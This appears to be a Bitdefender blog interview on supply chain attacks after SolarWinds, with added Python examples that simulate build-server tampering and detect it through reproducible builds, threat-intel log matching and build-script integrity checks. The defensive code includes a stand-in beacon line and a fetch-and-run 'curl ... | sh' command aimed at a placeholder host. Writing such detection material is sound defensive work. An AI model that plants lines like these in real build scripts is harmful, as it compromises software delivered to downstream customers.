Bitdefender data suggests IT teams face murky waters in 2021, as the disruptive shift to remote work and cloud-based operations continues to create security blind spots attackers can exploit. With the SolarWinds breach sending ripples well into the future, supply chain attacks are top of mind. Now is the time to consider a truly robust, layered cybersecurity tool stack, because no single technology layer can prevent attacks that silently climb the supply chain ladder.
Unpatched vulnerabilities, human error, misconfigurations and poor cybersecurity defenses threaten not just the organizations that harbor them, but also their customers. In 2021, business clients stand to inherit any security lapses their vendors exhibit. That is what happened in the recent SolarWinds hack, when a poisoned update to its Orion IT management platform was delivered through the vendor's own update channel to the infrastructures of its customers. In all, some 18,000 organizations installed the trojanized update, in what is believed to be a large-scale intelligence gathering campaign; the attackers then chose which of those footholds to pursue further.
Motivated politically or economically, advanced threat actors are increasingly targeting smaller companies to gain access to bigger targets. To understand the dangers of supply chain attacks and how to protect against them, we sat down with Dragos Gavrilut, our director of the Cyber Threat Intelligence Lab, and Cristina Vatamanu, senior team lead in the Cyber Threat Intelligence Lab, for their perspectives.
Q: How do supply chain attacks work from a technical standpoint?
Dragos: A supply chain attack is any cyberattack that seeks to tamper with the production process of a third-party software package in such a way that the delivered package is malicious. Attackers first compromise the supplier using common techniques like targeted phishing emails, malicious websites, guessing weak passwords, abusing Remote Desktop Protocol, etc. Then they move to find the production server (GitHub, Apache Subversion, etc.) where versioning development occurs on the company’s product. Here, the attackers change the software build currently in production, lacing it with malicious code, taking care to hide their tracks. When development is finished and the update is ready for shipping, the company unknowingly signs it with a valid certificate and sends it off to its customers. The customers are inadvertently infected when they deploy the new software, not knowing it’s been tainted.
From the attackers’ perspective, as long as they can infect the supplier, each one of the supplier’s customers also gets infected. The supplier is usually just a means to an end. While the end target may have robust cybersecurity layers in place, the supplier may not, and offers a much easier path to compromise. Because the software packages are signed with trusted security certificates, the software is deemed safe and no alarm bells go off. That’s what makes it so devilishly efficient!
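The sequence Dragos describes, tampering on the build server followed by the vendor signing whatever comes out, can be followed in code. The block below is an added example written for this page; it is not Bitdefender code and has nothing to do with the actual SolarWinds implant. The file names, the build step and the HMAC that stands in for a certificate signature are all assumptions. It shows why signature verification passes on the tampered release, and why an independent check that rebuilds from the reviewed source revision and compares digests catches it.

```python
import hashlib
import hmac

# Constructed supplier source tree (hypothetical file names; nothing here is real vendor code).
CLEAN_SOURCES = {
    "orion/agent.py": b"def collect():\n    return gather_metrics()\n",
    "build.sh": b"python -m compileall orion/\n",
}

# Stand-in for the vendor's code-signing key. A real pipeline would use an X.509
# certificate and an asymmetric signature; an HMAC keeps the example self-contained.
SIGNING_KEY = b"supplier-release-key"


def build(sources):
    """Deterministic build: serialises files in sorted order so the same inputs
    always yield the same bytes (the property a reproducible build provides)."""
    out = bytearray()
    for path in sorted(sources):
        out += path.encode() + b"\n" + sources[path] + b"\n"
    return bytes(out)


def sign(artifact):
    return hmac.new(SIGNING_KEY, artifact, hashlib.sha256).digest()


def verify_signature(artifact, signature):
    return hmac.compare_digest(sign(artifact), signature)


def attacker_implant(sources):
    """Step the attacker performs on the build server: lace the agent with a
    beacon before the release is signed (constructed payload, inert)."""
    tampered = dict(sources)
    tampered["orion/agent.py"] += b"beacon.call_home('c2.example.invalid')\n"
    return tampered


def release(sources):
    """The supplier's release step: build, then sign whatever came out."""
    artifact = build(sources)
    return artifact, sign(artifact)


def verify_reproducible(artifact, reviewed_sources):
    """Customer- or auditor-side check: rebuild from the reviewed source revision
    and compare digests. Ignores the signature entirely."""
    expected = hashlib.sha256(build(reviewed_sources)).hexdigest()
    return hashlib.sha256(artifact).hexdigest() == expected


def demo():
    """Returns (signature_ok, reproducible_ok) for a clean and a tampered release."""
    clean_artifact, clean_sig = release(CLEAN_SOURCES)
    bad_artifact, bad_sig = release(attacker_implant(CLEAN_SOURCES))
    return {
        "clean": (verify_signature(clean_artifact, clean_sig),
                  verify_reproducible(clean_artifact, CLEAN_SOURCES)),
        "tampered": (verify_signature(bad_artifact, bad_sig),
                     verify_reproducible(bad_artifact, CLEAN_SOURCES)),
    }


if __name__ == "__main__":
    print(demo())  # {'clean': (True, True), 'tampered': (True, False)}
```

The point to take from it: a valid signature only proves the artifact is what the vendor's pipeline produced, not that the pipeline was untouched. A reproducible build, or at minimum a digest recorded at a point the attacker cannot reach, gives the customer an independent reference to compare against.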
Q: Do you anticipate more supply chain attacks this year? Are any type of organizations or verticals more at risk?
Cristina: Definitely. In the context of cyber-espionage, we shouldn’t be surprised to see more headlines in 2021 akin to the SolarWinds hack. Yes, government entities are on attackers’ radar now more than ever. Critical infrastructures are likely also a target, in the same context. Financially motivated hackers will extort any entity that has enough capital to pay a ransom. There really isn’t a vertical that’s safe.
But if I were to name one vertical, I’d say service providers are in the attackers’ crosshairs most. Let me emphasize that: service providers are at the heart of the definition of “supply chain attack.” The business model perfectly facilitates infiltrating customer infrastructures. Once the provider is compromised, detecting the attack on the customers’ end is difficult, giving malicious actors enough time to gain the upper hand and inflict damage, from data exfiltration to malware infection to disrupting systems and processes. It’s a nightmare!
Q: What can organizations do to protect themselves?
Dragos: Considering the magnitude of the SolarWinds event and similar attacks over the years, you’d say supply chain attacks are a tough nut to crack; and you’d be right. The fact is, most organizations, big or small, don’t have the arsenal or the acumen required to fend off this invisible threat that seems to mushroom from within. And when they do detect it, it’s likely too late.
When we talk supply chain attacks, what we aim to achieve in terms of defenses is a multi-layered approach. I say this because the attack itself occurs in multiple phases. For example, simply compromising the supplier does not constitute a supply chain attack, in and of itself. However, a connection to the command and control center during this phase is likely to happen. This means that dynamic technologies – threat intel, for example – could detect some artifacts from the attack, like a connection to an unusual IP, or a flagged domain.
The vast majority of advanced attacks are targeted, meaning the threat actors designed a way to avoid preemptive methods of detection. If the attacker manages to modify code sources, build scripts, etc., this is where we can finally say the supply chain attack is truly unfolding. At this point, you want a combination of EDR technology and MDR services to sniff out anomalies and generate alerts when suspicious events happen. Otherwise you could infect your clients when your next patch or product update is shipped. Endpoint Risk Analytics provides even more context in such occurrences, and we can proudly say we have the industry’s first endpoint risk analytics capability integrated into endpoint protection.
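The two detection points Dragos names, a connection from the build environment to a flagged domain or address during the intrusion phase, and an unauthorized change to build scripts once the attacker has reached the pipeline, can be expressed as concrete checks. The block below is an added example, not Bitdefender's or any product's detection logic. The proxy log format, the indicator feed, the file contents and the baseline are constructed for illustration, and every address comes from the RFC 5737 documentation ranges.

```python
import hashlib
import ipaddress
import re

# Constructed threat-intel feed. The domain and the 203.0.113.0/24 range are
# documentation placeholders, not real indicators.
FLAGGED_DOMAINS = {"updates-cdn.example.invalid"}
FLAGGED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed egress-proxy log lines from a build host (RFC 5737 addresses throughout).
BUILD_HOST_LOGS = """\
2021-01-12T03:14:07Z build01 CONNECT dst=198.51.100.10 host=pypi.org user=ci
2021-01-12T03:14:09Z build01 CONNECT dst=203.0.113.45 host=updates-cdn.example.invalid user=ci
2021-01-12T03:15:22Z build01 CONNECT dst=198.51.100.20 host=github.com user=ci
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) CONNECT dst=(?P<dst>\S+) host=(?P<dom>\S+) user=(?P<user>\S+)$"
)


def match_threat_intel(log_text, domains=FLAGGED_DOMAINS, networks=FLAGGED_NETWORKS):
    """Return one alert per log line whose destination domain or address matches the feed."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; in production count these rather than drop them silently
        reasons = []
        if m["dom"] in domains:
            reasons.append("flagged domain")
        try:
            dst = ipaddress.ip_address(m["dst"])
        except ValueError:
            dst = None
        if dst is not None and any(dst in net for net in networks):
            reasons.append("flagged network")
        if reasons:
            alerts.append({"ts": m["ts"], "host": m["host"], "dst": m["dst"],
                           "domain": m["dom"], "reasons": reasons})
    return alerts


def sha256(data):
    return hashlib.sha256(data).hexdigest()


# Baseline captured from the reviewed commit of the build scripts (constructed contents).
BASELINE = {
    "build.sh": sha256(b"python -m compileall orion/\n"),
    "Makefile": sha256(b"all:\n\t./build.sh\n"),
}

# What is on the build server now: build.sh has grown an extra step and a new file appeared.
CURRENT_FILES = {
    "build.sh": b"python -m compileall orion/\ncurl -s http://updates-cdn.example.invalid/s | sh\n",
    "Makefile": b"all:\n\t./build.sh\n",
    "helper.sh": b"echo hi\n",
}


def check_build_script_integrity(baseline, current):
    """Compare build scripts against the baseline; returns sorted (path, finding) pairs."""
    findings = []
    for path, expected in baseline.items():
        if path not in current:
            findings.append((path, "missing"))
        elif sha256(current[path]) != expected:
            findings.append((path, "modified"))
    for path in current:
        if path not in baseline:
            findings.append((path, "unexpected"))
    return sorted(findings)


if __name__ == "__main__":
    for alert in match_threat_intel(BUILD_HOST_LOGS):
        print("ALERT", alert)
    for path, finding in check_build_script_integrity(BASELINE, CURRENT_FILES):
        print("INTEGRITY", path, finding)
```

The indicator match is only as good as the feed and is easy to evade with fresh infrastructure, which is why the second check matters: the baseline of build-script digests has to be stored somewhere the build host cannot write to, and any difference from it should page a human before the next release is signed.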